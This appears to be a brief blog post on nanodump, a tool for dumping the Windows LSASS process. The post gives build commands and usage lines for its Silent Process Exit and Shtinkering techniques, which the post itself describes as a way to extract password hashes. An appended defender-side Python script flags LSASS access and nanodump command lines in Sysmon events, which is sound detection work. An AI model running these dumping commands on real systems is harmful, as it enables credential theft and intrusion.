nanodump
- Thiru T
- Nov 23, 2024
LSASS (Local Security Authority Subsystem Service) is a Windows system process that enforces the security policy on the system. Its tasks include authenticating users for logon, enforcing security policies, and generating audit logs.
Creating a dump of this process can allow an attacker to extract password hashes or other sensitive information from the process's memory, which could be used to compromise the system further.
nanodump allows for the creation of a minidump of the LSASS process.
Install:
Install: (Linux with MinGW)
make -f Makefile.mingw
Install: (Windows with MSVC)
nmake -f Makefile.msvc
Install: (CobaltStrike only)
Import the NanoDump.cna script on Cobalt Strike.
Full installation information can be found here.
Usage:
# Run
nanodump.x64.exe
# Leverage the Silent Process Exit technique
nanodump --silent-process-exit C:\Windows\Temp\
# Leverage the Shtinkering technique
nanodump --shtinkering
Full usage information can be found here.
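A defender-side check for the activity described above, as an added example that is not part of the original post or of the nanodump project: it triages Sysmon-style ProcessAccess (Event ID 10) and ProcessCreate (Event ID 1) records for handles opened on lsass.exe and for the command-line options shown under Usage. The allowlist entry, the function names and the sample events are assumptions constructed for illustration.

```python
# Added example: triage of constructed Sysmon-style events for LSASS dumping.
RISKY_ACCESS = {              # Windows process access rights relevant to dumping
    0x0010: "PROCESS_VM_READ",
    0x0040: "PROCESS_DUP_HANDLE",
    0x0080: "PROCESS_CREATE_PROCESS",
}
PAGE_FLAGS = ("--silent-process-exit", "--shtinkering")  # options shown on this page
# Assumption: site-specific allowlist of tools expected to read LSASS (e.g. EDR).
ALLOWED_SOURCES = {r"c:\program files\windows defender\msmpeng.exe"}

def triage(event):
    """Return the reasons an event looks like LSASS dumping (empty list = no hit)."""
    reasons = []
    if event.get("EventID") == 10:        # Sysmon ProcessAccess
        source = event.get("SourceImage", "").lower()
        target = event.get("TargetImage", "").lower()
        if target.endswith("\\lsass.exe") and source not in ALLOWED_SOURCES:
            mask = int(event.get("GrantedAccess", "0x0"), 16)
            rights = [name for bit, name in RISKY_ACCESS.items() if mask & bit]
            if rights:
                reasons.append("lsass opened with " + "|".join(rights))
    elif event.get("EventID") == 1:       # Sysmon ProcessCreate
        cmd = event.get("CommandLine", "").lower()
        # Name and flag matching is low-fidelity; treat it as a supplement only.
        reasons += ["command line uses " + f for f in PAGE_FLAGS if f in cmd]
        if "nanodump" in event.get("Image", "").lower():
            reasons.append("image name contains nanodump")
    return reasons

def detect(events):
    """Return (index, reasons) for every event that produced at least one reason."""
    return [(i, r) for i, e in enumerate(events) if (r := triage(e))]

# Constructed sample events (not taken from the page or from a real host).
SAMPLE_EVENTS = [
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\svchost.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1000"},
    {"EventID": 10, "SourceImage": r"C:\Users\Public\nanodump.x64.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1010"},
    {"EventID": 10, "SourceImage": r"C:\Program Files\Windows Defender\MsMpEng.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1410"},
    {"EventID": 1, "Image": r"C:\Users\Public\nanodump.x64.exe",
     "CommandLine": "nanodump --silent-process-exit C:\\Windows\\Temp\\"},
    {"EventID": 1, "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe"},
]

if __name__ == "__main__":
    for index, why in detect(SAMPLE_EVENTS):
        print(index, why)
```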



